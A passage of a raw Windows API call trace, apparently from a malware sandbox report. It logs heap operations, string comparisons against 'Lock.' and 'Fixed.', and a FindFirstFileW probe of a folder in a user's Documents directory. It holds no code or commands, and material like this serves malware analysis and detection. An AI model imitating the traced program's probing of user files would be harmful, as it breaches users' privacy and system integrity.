dwCmpFlags=0x1, lpString1="OxO1y", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0260.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0260.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0260.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0260.309] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0260.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0260.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0260.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0260.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0260.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="52zSkSwJyavPCLOxO1y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0260.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2zSkSwJyavPCLOxO1y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0260.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zSkSwJyavPCLOxO1y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SkSwJyavPCLOxO1y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kSwJyavPCLOxO1y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SwJyavPCLOxO1y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wJyavPCLOxO1y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JyavPCLOxO1y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yavPCLOxO1y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avPCLOxO1y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0260.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vPCLOxO1y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PCLOxO1y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CLOxO1y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0260.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOxO1y", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0260.310] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0260.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0260.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0260.310] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0260.310] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0260.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0260.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0260.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0260.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0260.311] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0260.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0260.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0260.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0260.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0260.311] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0260.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0260.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0260.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0260.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0260.311] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0260.311] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.311] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0260.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0260.312] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0260.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0260.312] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0260.312] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0260.312] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/52zSkSwJyavPCLOxO1y", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9a64e980, ftCreationTime.dwHighDateTime=0x1d4c9e7, ftLastAccessTime.dwLowDateTime=0x582b0780, ftLastAccessTime.dwHighDateTime=0x1d4c608, ftLastWriteTime.dwLowDateTime=0x582b0780, ftLastWriteTime.dwHighDateTime=0x1d4c608, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa730047, dwReserved1=0x21b10, cFileName="52zSkSwJyavPCLOxO1y", cAlternateFileName="52ZSKS~1")) returned 0xaa57a0 [0260.312] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0260.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0260.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.313] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0260.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0260.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0260.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0260.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0260.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0260.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.315] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0260.315] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0260.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0260.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0260.315] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.316] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0260.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0260.317] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.317] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0260.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.317] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0260.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.318] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0260.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.318] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0260.319] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.319] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0260.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0260.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0260.321] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0260.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0260.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0260.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0260.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0260.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0260.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0260.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.323] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0260.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0260.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0260.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0260.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0260.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0260.324] 